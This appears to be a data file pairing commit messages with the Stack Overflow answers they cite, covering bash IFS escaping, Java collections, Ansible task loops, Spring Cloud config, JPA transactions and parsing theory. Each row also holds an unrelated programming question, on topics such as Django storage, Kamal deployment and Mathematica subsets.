&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Expected Output&lt;/h3&gt;
&lt;p&gt;For the &lt;code&gt;else&lt;/code&gt; block (&lt;code&gt;alert(3)&lt;/code&gt;), the condition should be:&lt;/p&gt;
&lt;p&gt;å¤åˆ¶&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;100 &amp;gt; a å¹¶ä¸” éž(a &amp;gt; 200) ä¸” éž(a &amp;gt; 100)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, the current implementation generates incorrect conditions because the parent condition context is not properly maintained.&lt;/p&gt;
&lt;h3&gt;Current Implementation&lt;/h3&gt;
&lt;p&gt;Hereâ€™s the relevant part of my code:&lt;/p&gt;
&lt;p&gt;javascript&lt;/p&gt;
&lt;p&gt;å¤åˆ¶&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (
    node.type === 'BlockStatement' &amp;amp;&amp;amp;
    parent.type === 'IfStatement' &amp;amp;&amp;amp;
    parent.alternate === node
) {
    // Attempt to get the parent condition
    const parentCondition = currentConditionContext.parent.condition; // âŒ Fails here
    currentConditionContext = {
        type: 'else',
        condition: `éž(${parentCondition})`,
        parent: currentConditionContext.parent.parent, // Incorrect parent reference
        siblingNegation: null
    };
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Issue&lt;/h3&gt;
&lt;p&gt;The problem occurs because:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;The &lt;code&gt;else&lt;/code&gt; block incorrectly skips a level when referencing the parent context (&lt;code&gt;parent.parent&lt;/code&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The parent condition is not accessible due to the incorrect parent reference.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Question&lt;/h3&gt;
&lt;p&gt;How can I properly maintain the parent condition context for &lt;code&gt;else&lt;/code&gt; blocks to generate the correct negation of the preceding &lt;code&gt;if&lt;/code&gt; condition?&lt;/p&gt;
&lt;h3&gt;Desired Solution&lt;/h3&gt;
&lt;p&gt;I need a way to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Correctly reference the parent condition context for &lt;code&gt;else&lt;/code&gt; blocks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Generate the negation of the preceding &lt;code&gt;if&lt;/code&gt; condition dynamically.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Ensure the condition chain is accurate for nested &lt;code&gt;if-else&lt;/code&gt; structures.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Additional Context&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Iâ€™m using &lt;code&gt;esprima&lt;/code&gt; for parsing, &lt;code&gt;estraverse&lt;/code&gt; for traversal, and &lt;code&gt;escodegen&lt;/code&gt; for code generation.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The condition chain should support arbitrary levels of nesting.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Hereâ€™s the full code for reference:&lt;/p&gt;
&lt;p&gt;javascript&lt;/p&gt;
&lt;p&gt;å¤åˆ¶&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Full code implementation
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any guidance or suggestions would be greatly appreciated!&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;This question is clear, concise, and provides all the necessary context for someone to understand and help with your issue. You can replace the &lt;code&gt;// Full code implementation&lt;/code&gt; comment with your actual code if needed.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;this is my code, The following code does not achieve the desired effect&lt;/strong&gt;&lt;/h1&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import esprima from 'esprima';
import estraverse from 'estraverse';
import escodegen from 'escodegen';
export function analyzeFunctionCalls(code, functionName, methods) {
    try {
        const ast = esprima.parseScript(code, { range: true, tokens: true, comment: true });
        const functionCalls = [];
        const variableMap = {};
        // æ ‘å½¢æ¡ä»¶é“¾ç®¡ç†ï¼ˆä½¿ç”¨æ ¹èŠ‚ç‚¹åˆå§‹åŒ–ï¼‰
        let currentConditionNode = { 
            condition: null, 
            parent: null, 
            children: [] 
        };
        estraverse.traverse(ast, {
            enter: (node, parent) =&amp;gt; {
                // å˜é‡å£°æ˜Žå¤„ç†
                if (node.type === 'VariableDeclaration') {
                    node.declarations.forEach(declaration =&amp;gt; {
                        if (declaration.init) {
                            variableMap[declaration.id.name] = escodegen.generate(declaration.init);
                        }
                    });
                }
                // å¤„ç† if è¯­å¥
                if (node.type === 'IfStatement') {
                    const condition = processCondition(node.test, variableMap);
                    // åˆ›å»ºæ–°çš„æ¡ä»¶èŠ‚ç‚¹å¹¶é“¾æŽ¥åˆ°å½“å‰èŠ‚ç‚¹
                    const newNode = {
                        condition: condition,
                        parent: currentConditionNode,
                        children: []
                    };
                    currentConditionNode.children.push(newNode);
                    currentConditionNode = newNode;
                }
                // å¤„ç† else if
                if (
                    node.type === 'IfStatement' &amp;amp;&amp;amp;
                    parent.type === 'IfStatement' &amp;amp;&amp;amp;
                    parent.alternate === node
                ) {
                    // èŽ·å–çˆ¶ if çš„æ¡ä»¶
                    const parentIfCondition = currentConditionNode.parent.condition;
                    const currentCondition = processCondition(node.test, variableMap);
                    // åˆ›å»º else if èŠ‚ç‚¹
                    const newNode = {
                        condition: `éž(${parentIfCondition}) ä¸” ${currentCondition}`,
                        parent: currentConditionNode.parent, // å…³é”®ä¿®æ­£ï¼šçˆ¶èŠ‚ç‚¹æŒ‡å‘åŽŸ if çš„çˆ¶çº§
                        children: []
                    };
                    currentConditionNode.parent.children.push(newNode);
                    currentConditionNode = newNode;
                }
                // å¤„ç† else å—
                if (
                    node.type === 'BlockStatement' &amp;amp;&amp;amp;
                    parent.type === 'IfStatement' &amp;amp;&amp;amp;
                    parent.alternate === node
                ) {
                    // èŽ·å–çˆ¶ if çš„æ¡ä»¶
                    const parentIfCondition = currentConditionNode.parent.condition;
                    // åˆ›å»º else èŠ‚ç‚¹
                    const newNode = {
                        condition: `éž(${parentIfCondition})`,
                        parent: currentConditionNode.parent, // å…³é”®ä¿®æ­£ï¼šçˆ¶èŠ‚ç‚¹æŒ‡å‘åŽŸ if çš„çˆ¶çº§
                        children: []
                    };
                    currentConditionNode.parent.children.push(newNode);
                    currentConditionNode = newNode;
                }
                // æ”¶é›†å‡½æ•°è°ƒç”¨
                if (node.type === 'CallExpression') {
                    const callee = node.callee;
                    const fullCondition = getFullConditionChain(currentConditionNode);
                    if (
                        (callee.type === 'Identifier' &amp;amp;&amp;amp; methods.includes(callee.name)) ||
                        (callee.type === 'MemberExpression' &amp;amp;&amp;amp;
                         callee.object.name === functionName &amp;amp;&amp;amp;
                         methods.includes(callee.property.name))
                    ) {
                        functionCalls.push({
                            call: escodegen.generate(node),
                            condition: fullCondition
                        });
                    }
                }
            },
            leave: (node) =&amp;gt; {
                // ç¦»å¼€ if è¯­å¥æ—¶å›žæº¯åˆ°çˆ¶èŠ‚ç‚¹
                if (node.type === 'IfStatement') {
                    currentConditionNode = currentConditionNode.parent;
                }
            }
        });
        return functionCalls;
    } catch (error) {
        console.error('Error parsing code:', error);
        return [];
    }
}
// ç”Ÿæˆå®Œæ•´æ¡ä»¶é“¾ï¼ˆä»Žæ ¹åˆ°å½“å‰èŠ‚ç‚¹ï¼‰
function getFullConditionChain(node) {
    const path = [];
    let current = node;
    while (current &amp;amp;&amp;amp; current.condition !== null) {
        path.unshift(current.condition);
        current = current.parent;
    }
    return path.join(' å¹¶ä¸” ');
}
// ä¼˜åŒ–åŽçš„æ¡ä»¶å¤„ç†
function processCondition(testNode, variableMap) {
    return escodegen.generate(testNode)
        .replace(/\b\w+\b/g, m =&amp;gt; variableMap[m] || m)
        .replace(/&amp;gt;=/g, 'â‰¥')
        .replace(/&amp;lt;=/g, 'â‰¤')
        .replace(/===/g, 'ç­‰äºŽ')
        .replace(/==/g, 'ç­‰äºŽ')
        .replace(/!=/g, 'â‰ ')
        .replace(/&amp;gt;/g, 'ï¼ž')
        .replace(/&amp;lt;/g, 'ï¼œ')
        .replace(/\|\|/g, ' æˆ– ')
        .replace(/&amp;amp;&amp;amp;/g, ' ä¸” ')
        .replace(/!/g, 'éž');
}
console.log(analyzeFunctionCalls(`
function foo(a, b) {
    var c = 100
    if(c &amp;gt; a){
        if( a &amp;gt; 200){
            alert(1)
            alert(4)
        }else if(a &amp;gt; 100){
            alert(2)
            if(b &amp;gt; 200){
                alert(5)
            }else{
                alert(6)
            }
            alert(7)
        }else{
            alert(3)
            if(b &amp;gt; 200){
                alert(8)
            }else{
                alert(9)
            }
            alert(10)
        }    
    }
}
`, &amp;quot;DV&amp;quot;,[&amp;quot;alert&amp;quot;]));
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;&lt;strong&gt;expected result&lt;/strong&gt;&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;[
{ call: 'alert(1)', condition: '100ï¼ža å¹¶ä¸” aï¼ž200' },
{ call: 'alert(4)', condition: '100ï¼ža å¹¶ä¸” aï¼ž200' },
{ call: 'alert(2)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” aï¼ž100' },
{ call: 'alert(5)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” aï¼ž100 å¹¶ä¸” bï¼ž200' },
{ call: 'alert(6)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” aï¼ž100 å¹¶ä¸” éž(bï¼ž200)' },
{ call: 'alert(7)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” aï¼ž100' },
{ call: 'alert(3)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” éž(aï¼ž100)' }, // âœ… æ­£ç¡®
{ call: 'alert(8)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” éž(aï¼ž100) å¹¶ä¸” bï¼ž200' }, // âœ…
{ call: 'alert(9)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” éž(aï¼ž100) å¹¶ä¸” éž(bï¼ž200)' }, // âœ…
{ call: 'alert(10)', condition: '100ï¼ža å¹¶ä¸” éž(aï¼ž200) ä¸” éž(aï¼ž100)' } // âœ…
]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;actual result&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[
  { call: 'alert(1)', condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200' },
  { call: 'alert(4)', condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200' },
  {
    call: 'alert(2)',
    condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200) ä¸” a ï¼ž 100'
  },
  {
    call: 'alert(5)',
    condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200) ä¸” a ï¼ž 100 å¹¶ä¸” b ï¼ž 200'
  },
  {
    call: 'alert(6)',
    condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200) ä¸” a ï¼ž 100 å¹¶ä¸” éž(éž(a ï¼ž 200) ä¸” a ï¼ž 100)'
  },
  {
    call: 'alert(7)',
    condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200) ä¸” a ï¼ž 100'
  },
  { call: 'alert(3)', condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200)' },
  {
    call: 'alert(8)',
    condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200) å¹¶ä¸” b ï¼ž 200'
  },
  {
    call: 'alert(9)',
    condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200) å¹¶ä¸” éž(éž(a ï¼ž 200))'
  },
  { call: 'alert(10)', condition: '100 ï¼ž a å¹¶ä¸” a ï¼ž 200 å¹¶ä¸” éž(a ï¼ž 200)' }
]
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;&lt;strong&gt;Is there a god to help me&lt;/strong&gt;&lt;/h1&gt;
&lt;h1&gt;thank you&lt;/h1&gt;
</t>
  </si>
  <si>
    <t>C828</t>
  </si>
  <si>
    <t>submit encryption jobs: fix IFS-escaping to work properly.
There are apparently some tricky escaping rules around setting IFS to newlines. Use the POSIX-portable way of
'just' having a literal newline/linebreak in the string, instead of the more exotic, bash-only escaping syntaxes.
See also: https://stackoverflow.com/q/16831429/2964696</t>
  </si>
  <si>
    <t>Because as bash manual says regarding
command substitution
:
Bash performs the expansion by executing command and replacing the command substitution with the standard output of the command, with any trailing newlines deleted.
So, by adding
\b
you prevent removal of
\n
.
A cleaner way to do this could be to use
$''
quoting, like this:
IFS=$'\n'</t>
  </si>
  <si>
    <t xml:space="preserve">We have a product built on the Client-Server architecture. Some details about the technology stack used.
Client - Java Swing    
Server - RMI
Java Database - Oracle
The clients are located at different parts of the world but the java server &amp; the oracle database are located on the same machine in Sweden. Because of this there is a lot of network latency. The clients located at distant locations have terrible performance. The application is used for processing files with the size over 50MB. Each operation in general requires about over 1000 Network calls. 
Based on your experience, how do you tackle this problem and improve the performance?
EDIT: To answer a few questions
Files contains the actual business data which needs to be processed and updated to the database cannot be sent in part.
Some of the network calls could be batched but it would require major refactoring of the code. This is a very old application written way back in 2001. And the design of the application is such that, the server holds all the services and they are made reusable across the code and the business logic is written on the client side. So, this business logic calls server numerous times and hence the astronomical figure.
-Snehal
</t>
  </si>
  <si>
    <t>C829</t>
  </si>
  <si>
    <t>Fixed an issue with ComponentSelector
Specifically: ComponentSelector doesn't return Components in the correct order discussed here: https://stackoverflow.com/questions/57734646/componentselector-doesnt-return-components-in-the-correct-order</t>
  </si>
  <si>
    <t>This is caused because the class used
HashSet
to prevent duplicates. I replaced that with
LinkedHashSet
which should hopefully resolve the problem:
https://github.com/codenameone/CodenameOne/commit/2ef6a77e4f8ac3475a8c05541b8ac829099ac9a9</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I find this,
&lt;a href="https://django-storages.readthedocs.io/en/latest/backends/gcloud.html" rel="nofollow noreferrer"&gt;https://django-storages.readthedocs.io/en/latest/backends/gcloud.html&lt;/a&gt;
Since my Django is 5.1, I modify the settings.py like this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;STORAGES = {
    &amp;quot;default&amp;quot;: {
        &amp;quot;BACKEND&amp;quot;: &amp;quot;storages.backends.gcloud.GoogleCloudStorage&amp;quot;,
        &amp;quot;OPTIONS&amp;quot;: {
            &amp;quot;bucket_name&amp;quot;: &amp;quot;erp-backend&amp;quot;,
            &amp;quot;location&amp;quot;: &amp;quot;media&amp;quot;,
            &amp;quot;project_id&amp;quot;: &amp;quot;smart-portfolio-412002&amp;quot;,
        },
    },
    &amp;quot;staticfiles&amp;quot;: {
        &amp;quot;BACKEND&amp;quot;: &amp;quot;storages.backends.gcloud.GoogleCloudStorage&amp;quot;,
        &amp;quot;OPTIONS&amp;quot;: {
            &amp;quot;bucket_name&amp;quot;: &amp;quot;erp-backend&amp;quot;,
            &amp;quot;location&amp;quot;: &amp;quot;static&amp;quot;,
        },
    },
}
STATIC_URL = &amp;quot;https://storage.googleapis.com/erp-backend/static/&amp;quot;
MEDIA_URL = &amp;quot;https://storage.googleapis.com/erp-backend/media/&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I can find file uploaded by DRF APIs in bucket. But When going to Django admin, there's AttributeError&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception Value:    
you need a private key to sign credentials.the credentials you are currently using &amp;lt;class 'google.auth.compute_engine.credentials.Credentials'&amp;gt; just contains a token. see https://googleapis.dev/python/google-api-core/latest/auth.html#setting-up-a-service-account for more details.
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;p&gt;I deploy a Django/React project with GKE, Cloud SQL as DB, Cloud Storage for static file.
When I trying upload files(both by Django admin and API), the url I get always tells me&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;This XML file does not appear to have any style information associated with it. The document tree is shown below.
&amp;lt;Error&amp;gt;
&amp;lt;Code&amp;gt;NoSuchKey&amp;lt;/Code&amp;gt;
&amp;lt;Message&amp;gt;The specified key does not exist.&amp;lt;/Message&amp;gt;
&amp;lt;Details&amp;gt;No such object: my-bucket/media/uploads/01.JPG&amp;lt;/Details&amp;gt;
&amp;lt;/Error&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tryed directly upload file in GCP console and file can be visited.
Also when I use&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gsutil cp .gitignore gs://my-bucket/media/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;file can be visited.&lt;/p&gt;
&lt;p&gt;below are my &lt;code&gt;settings.py&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/5.1/howto/static-files/
DEFAULT_FILE_STORAGE = 'storages.backends.gcloud.GoogleCloudStorage'
STATICFILES_STORAGE = 'storages.backends.gcloud.GoogleCloudStorage'
GS_BUCKET_NAME = 'my-bucket'
GS_MEDIA_BUCKET_NAME = 'my-bucket'
GS_DEFAULT_ACL = 'publicRead'
GS_FILE_OVERWRITE = False
STATIC_URL = f&amp;quot;https://storage.googleapis.com/{GS_BUCKET_NAME}/static/&amp;quot;
MEDIA_URL = f&amp;quot;https://storage.googleapis.com/{GS_MEDIA_BUCKET_NAME}/media/&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and deployment.yaml&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: app
spec:
  replicas: 2
  selector:
    matchLabels:
      app: app
  template:
    metadata:
      labels:
        app: app
    spec:
      serviceAccountName: my-service-account
      containers:
      - name: app
        image: asia-east1-docker.pkg.dev/my-project-id/app/backend:latest
        ports:
        - containerPort: 8000
        env:
          - name: DB_USER
          - name: DB_PASSWORD
          - name: DB_NAME
          - name: DB_HOST
          - name: DB_PORT
        resources:
          requests:
            memory: &amp;quot;512Mi&amp;quot;
            cpu: &amp;quot;500m&amp;quot;
          limits:
            memory: &amp;quot;1Gi&amp;quot;
            cpu: &amp;quot;1&amp;quot;
      - name: cloud-sql-proxy
        image: gcr.io/cloud-sql-connectors/cloud-sql-proxy:latest
        args:
        volumeMounts:
          - name: cloudsql
            mountPath: /cloudsql
        securityContext:
          runAsNonRoot: true
        resources:
          requests:
            memory: &amp;quot;256Mi&amp;quot;
            cpu: &amp;quot;100m&amp;quot;
          limits:
            memory: &amp;quot;512Mi&amp;quot;
            cpu: &amp;quot;250m&amp;quot;
      volumes:
      - name: cloudsql
        emptyDir:
          medium: Memory
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want is that when I upload by API or Django admin, I can find files in my bucket.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C83</t>
  </si>
  <si>
    <t>make add admin and admin login form works
references: https://stackoverflow.com/questions/37472870/login-user-fails-to-get-user-id (4/7/2020 1:15AM)</t>
  </si>
  <si>
    <t>You just need to add a  get_id() function in order to override the default properties of get_id() under the User class in the models.py file where your database schema is defined.
class User(#...):
    # ...
    def get_id(self):
           return (self.user_id)
    # ...</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Mathematica I implemented this simple code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;n = 8;
a0 = Range[0, n - 1];
a1 = Subsets[a0, {2}];
a2 = Subsets[a1, {2}];
a3 = Select[a2, Length[Union[Flatten[#]]] == 4 &amp;amp;];
a4 = Subsets[a3, {n/4}];
a5 = Select[a4, Length[Union[Flatten[#]]] == n &amp;amp;];
a6 = Map[Flatten, a5, 1];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where &lt;code&gt;n&lt;/code&gt; can take values â€‹â€‹such as 4, 8, 12, 16, ...&lt;/p&gt;
&lt;p&gt;The problem is that already with &lt;code&gt;n = 12&lt;/code&gt;, you don't get anywhere, because the size of &lt;code&gt;a4&lt;/code&gt; becomes huge. What algorithm could be used to obtain &lt;code&gt;a6&lt;/code&gt; directly from &lt;code&gt;a0&lt;/code&gt; or &lt;code&gt;n&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C830</t>
  </si>
  <si>
    <t>[refactor] k8s-images.yml into re-useable _promote_image.yml
As per https://stackoverflow.com/a/39041069 this is currently the
least ugly way to achieve code reuse in Ansible.
- Unfortunately we have to hoist the `include_tasks` mantra into
main.yml</t>
  </si>
  <si>
    <t>As of today you can use with_items with include, so you'd need to split your playbook into two files:
- name: download and execute
  hosts: server1
  tasks:
  - include: subtasks.yml file={{item}}
    with_items:
    - "file1.sh"
    - "file2.sh"
and subtasks.yml:
- get_url: url="some-url/{{file}}" dest="/tmp/{{file}}"
- shell: /tmp/{{file}} &gt;&gt; somelog.txt
There was a request to make with_items applicable to block, but the Ansible team has said it will never be supported.</t>
  </si>
  <si>
    <t xml:space="preserve">I am using the MVC pattern in ASP.NET using service (BLL) and repository layers for data managment.  In some cases, I want to send out an automatic e-mail when a new request is sent through our website.  In what layer of the architecture should this e-mail be sent? In the controller layer or the service layer? I was thinking the service layer, since that is where "business logic" is supposed to go, but am not 100% sure if that is semantically correct.
Edit: When I say "new request" I mean that a user takes an action that saves to some sort of datastore. As an example they create a new "Project" on the website.  So the request will pass through the controller &gt; service &gt; repository  layers.
</t>
  </si>
  <si>
    <t>C831</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In GDB by &lt;kbd&gt;Ctrl&lt;/kbd&gt;+&lt;kbd&gt;C&lt;/kbd&gt; I can have the debugger stopped at the instruction currently executed, I can then issue a &lt;code&gt;continue&lt;/code&gt; command to let it resume.&lt;/p&gt;
&lt;p&gt;In Pycharm can I do achieve the same? Clicking the &amp;quot;stop&amp;quot; button it simply exits the process.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C832</t>
  </si>
  <si>
    <t>change 1/2: changed application.properties to bootstrap.properties
change 2/2: added
                          &lt;dependency&gt;
                              &lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;
                              &lt;artifactId&gt;spring-cloud-starter-bootstrap&lt;/artifactId&gt;
                          &lt;/dependency&gt;
 url: https://stackoverflow.com/questions/64880940/microservice-doesnt-fetch-properties-from-spring-cloud-config-server-microservi</t>
  </si>
  <si>
    <t>I've already solved my problem. Bootstrap.properties file is no longer enabled by default. You can enable it by adding new dependency:
&lt;dependency&gt;
            &lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;
            &lt;artifactId&gt;spring-cloud-starter-bootstrap&lt;/artifactId&gt;
        &lt;/dependency&gt;
or alternatively, you can remove bootstrap.properties file and provide these properties in your application.properties file
spring.config.import=configserver:*URI to your cloud config server*
spring.cloud.config.name=*Your cloud config server name*</t>
  </si>
  <si>
    <t xml:space="preserve">I am using libsigc++ to wire up an application, and is uncertain as to the easier way of going about it. 
There is a  preexisting object hierarchy that manages the data layer, and the top level object exposes all functions. All good so far.
To this I am adding a GUI object hierarchy, and in the application object I am hooking them together with signal connections. To make a connection, I need pointers to both sender and receiver.
Now, do I hook in a child widget, far down in the tree, directly, thus requiring pointers to be passed up and down the tree? 
Or, do I go through the painstaking processes of hooking in signals and slots at every step in the chain?
On the one hand, passing pointers break the separation that the sig-slot model buys you. On the other hand, creating connections at every step does not seem to rhyme with the supposed "event telepathy" that the sig-slots are supposed to provide.
Which one would someone experienced with this model consider the default approach?
</t>
  </si>
  <si>
    <t>C833</t>
  </si>
  <si>
    <t>Merge pull request #13 from fabriceHategekimana/group-service-db
Added working db. Need to clean a bit persistence.xml, project yml for datasources + jdbc drivers.
Part of code inspired by [Koor.fr](https://koor.fr/Java/TutorialJEE/jee_jpa_introduction.wp) and [microservices template](https://github.com/hostettler/microservices)
Need to :
- clean files, codes. Need to pass sonar cloud quality gate
- learn more about these to make better codes.
- [JTA vs resource local](https://stackoverflow.com/questions/1962525/persistence-unit-as-resource-local-or-jta)
- Check JSON/Inputs for REST API
- Unit test, IT with jacoco (pre-integration test and post-integration test etc.)</t>
  </si>
  <si>
    <t>JPA implementations have the choice of managing transactions themselves (
RESOURCE_LOCAL
), or having them managed by the application server's JTA implementation.
In most cases, RESOURCE_LOCAL is fine. This would use basic JDBC-level transactions. The downside is that the transaction is local to the JPA persistence unit, so if you want a transaction that spans multiple persistence units (or other databases), then RESOURCE_LOCAL may not be good enough.
JTA is also used for managing transactions across systems like JMS and JCA, but that's fairly exotic usage for most of us.
To use JTA, you need support for it in your application server, and also support from the JDBC driver.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am deploying a nextjs-golang-crud-app with Kamal 2 (source: &lt;a href="https://github.com/pooulad/nextjs-golang-crud-app" rel="nofollow noreferrer"&gt;https://github.com/pooulad/nextjs-golang-crud-app&lt;/a&gt;). After successful deployment with the backend container (port 8080), I run &lt;code&gt;kamal setup&lt;/code&gt; to continue the deployment of my frontend (port 3000). They are both in the kamal docker network (bridge), and are exposed through kamal-proxy container.&lt;/p&gt;
&lt;p&gt;The problem is the deployment result with this error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ERROR (SSHKit::Command::Failed): Exception while executing on host localhost: docker exit status: 1
docker stdout: Nothing written
docker stderr: Error: host settings conflict with another service
exit status 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can deploy both backend and frontend independently. My reflection is the conflict happened because both backend and frontend are exposed through port 80 of &lt;code&gt;kamal-proxy&lt;/code&gt;, so the kamal-proxy did not know which container to route the traffic to.&lt;/p&gt;
&lt;p&gt;My frontend's kamal deploy config:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;service: ngca-frontend
image: hunger1607/ngca-frontend
servers:
  - 127.0.0.1
ssh:
  keys: [~/abel-ec2-keypair.pem]
  user: ubuntu
registry:
  username:
    - DOCKER_REGISTRY_USERNAME
  password:
    - DOCKER_REGISTRY_PASSWORD
builder:
  arch:
    - amd64
  dockerfile: Dockerfile
env:
  clear:
    PORT: &amp;quot;3000&amp;quot;
proxy:
  app_port: 3000
  response_timeout: 120
  healthcheck:
    interval: 5
    path: /
    timeout: 60
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My backend's kamal deploy config:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;service: ngca-backend
image: hunger1607/ngca-backend
servers:
  - 127.0.0.1
ssh:
  keys: [~/abel-ec2-keypair.pem]
  user: ubuntu
  keys_only: true
registry:
  username: 
    - DOCKER_REGISTRY_USERNAME
  password: 
    - DOCKER_REGISTRY_PASSWORD
builder:
  arch: 
    - amd64
  dockerfile: Dockerfile
env:
  clear:
    API_PORT: &amp;quot;8080&amp;quot;
    DB_PORT: &amp;quot;5432&amp;quot;
    DB_USER: &amp;quot;postgres&amp;quot;
    DB_PASS: &amp;quot;postgres&amp;quot;
    DB_NAME: &amp;quot;postgres&amp;quot;
    DB_HOST: &amp;quot;ngca-backend-db&amp;quot;
accessories:
  db:
    image: postgres:15
    host: ubuntu@localhost
    port: 5432
    env:
      clear:
        POSTGRES_USER: postgres
        POSTGRES_DB: postgres
      secret:
        - POSTGRES_PASSWORD
proxy:
  app_port: 8080
  response_timeout: 210
  healthcheck:
    interval: 5
    path: /swagger/index.html
    timeout: 300
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please help me to explain why that error occurred and how to fix it. Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C834</t>
  </si>
  <si>
    <t>Patterns of Distributed Systems, Monoliths to Microservices, Dapr, Nextcloud, LL and LR parsing, deploy GitHub, Khan Academy, Encryption, (02/20) '패배자같은 개발 직무' 탈출법
Patterns of Distributed Systems https://martinfowler.com/articles/patterns-of-distributed-systems
Migrating Monoliths to Microservices with Decomposition and Incremental Changes https://www.infoq.com/articles/migrating-monoliths-to-microservices-with-decomposition
Dapr - Distributed Application Runtime https://dapr.io
클라우드 스토리지: Nextcloud | Varins https://varins.com/library/server/cloud-storage-nextcloud
algorithm - What is the difference between LL and LR parsing? - Stack Overflow https://stackoverflow.com/questions/5975741/what-is-the-difference-between-ll-and-lr-parsing
Improving how we deploy GitHub - The GitHub Blog https://github.blog/2021-01-25-improving-how-we-deploy-github
Khan Academy | Free Online Courses, Lessons &amp; Practice https://www.khanacademy.org
khan-dl: Download courses from khanacademy.org https://github.com/rand-net/khan-dl
Application Level Encryption for Software Architects https://www.infoq.com/articles/ale-software-architects
(02/20) '패배자같은 개발 직무' 탈출법 - YouTube https://www.youtube.com/watch?v=cmjVEkIdD3k</t>
  </si>
  <si>
    <t>At a high level, the difference between LL parsing and LR parsing is that LL parsers begin at the start symbol and try to apply productions to arrive at the target string, whereas LR parsers begin at the target string and try to arrive back at the start symbol.
An LL parse is a left-to-right, leftmost derivation.  That is, we consider the input symbols from the left to the right and attempt to construct a leftmost derivation.  This is done by beginning at the start symbol and repeatedly expanding out the leftmost nonterminal until we arrive at the target string.  An LR parse is a left-to-right, rightmost derivation, meaning that we scan from the left to right and attempt to construct a rightmost derivation.  The parser continuously picks a substring of the input and attempts to reverse it back to a nonterminal.
During an LL parse, the parser continuously chooses between two actions:
Predict
